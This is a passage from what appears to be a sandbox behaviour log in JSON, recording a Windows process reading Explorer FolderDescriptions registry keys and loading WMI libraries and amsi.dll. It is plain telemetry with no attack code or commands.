"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 118, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 119, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 120, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 121, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 122, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 123, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 124, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 125, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir", "content": "C:\\Program Files" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 126, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 127, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name", "content": "SystemX86" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 128, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 129, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 130, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 131, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 132, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 133, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 134, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 135, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 136, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 137, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,156", "eid": 138, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 139, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 140, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 141, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 142, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 143, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 144, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 145, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 146, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:26,172", "eid": 147, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 148, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 149, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name", "content": "System" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 150, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 151, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 152, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 153, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 154, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 155, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 156, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 157, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 158, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 159, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 160, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 161, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 162, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 163, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 164, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 165, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 166, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 167, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 168, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 169, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category", "content": "2" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 170, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name", "content": "Windows" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 171, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 172, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 173, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 174, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 175, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 176, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 177, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 178, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 179, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 180, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 181, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 182, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 183, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 184, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 185, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 186, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 187, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 188, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:26,172", "eid": 189, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:28,406", "eid": 190, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies", "content": null } }, { "event": "findwindow", "object": "windowname", "timestamp": "2025-11-20 10:58:28,437", "eid": 191, "data": { "classname": "#32771", "windowname": "" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,469", "eid": 192, "data": { "file": "API-MS-Win-Core-LocalRegistry-L1-1-0.dll", "pathtofile": null, "moduleaddress": "0x7ffee1090000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,469", "eid": 193, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.dll", "pathtofile": null, "moduleaddress": "0x7ffed9590000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,469", "eid": 194, "data": { "file": "C:\\Windows\\System32\\advapi32.dll", "pathtofile": null, "moduleaddress": "0x7ffee2b50000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,484", "eid": 195, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemprox.dll", "pathtofile": null, "moduleaddress": "0x7ffedc850000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,484", "eid": 196, "data": { "file": "C:\\Windows\\System32\\wbem\\wmiutils.dll", "pathtofile": null, "moduleaddress": "0x7ffedc210000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,531", "eid": 197, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", "pathtofile": null, "moduleaddress": "0x7ffed94f0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,531", "eid": 198, "data": { "file": "api-ms-win-core-localization-l1-2-0.dll", "pathtofile": null, "moduleaddress": "0x7ffee1090000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,531", "eid": 199, "data": { "file": "api-ms-win-core-localization-obsolete-l1-1-0.dll", "pathtofile": null, "moduleaddress": "0x7ffee1090000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,719", "eid": 200, "data": { "file": "C:\\Windows\\System32\\wbem\\fastprox.dll", "pathtofile": null, "moduleaddress": "0x7ffed3fc0000" } }, { "event": "load", "object": "library", "timestamp": "2025-11-20 10:58:29,719", "eid": 201, "data": { "file": "amsi.dll", "pathtofile": null, "moduleaddress": "0x7ffede1c0000" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,750", "eid": 202, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)", "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,750", "eid": 203, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,750", "eid": 204, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,750", "eid": 205, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,750", "eid": 206, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252", "content": "c_1252.nls" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,750", "eid": 207, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,750", "eid": 208, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,766", "eid": 209, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,766", "eid": 210, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,766", "eid": 211, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,781", "eid": 212, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "file", "timestamp": "2025-11-20 10:58:29,781", "eid": 213, "data": { "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 214, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 215, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 216, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)", "content": "{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 217, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 218, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 219, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)", "content": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" } }, { "event": "read", "object": "registry", "timestamp": "2025-11-20 10:58:29,781", "eid": 220, "data": { "regkey": 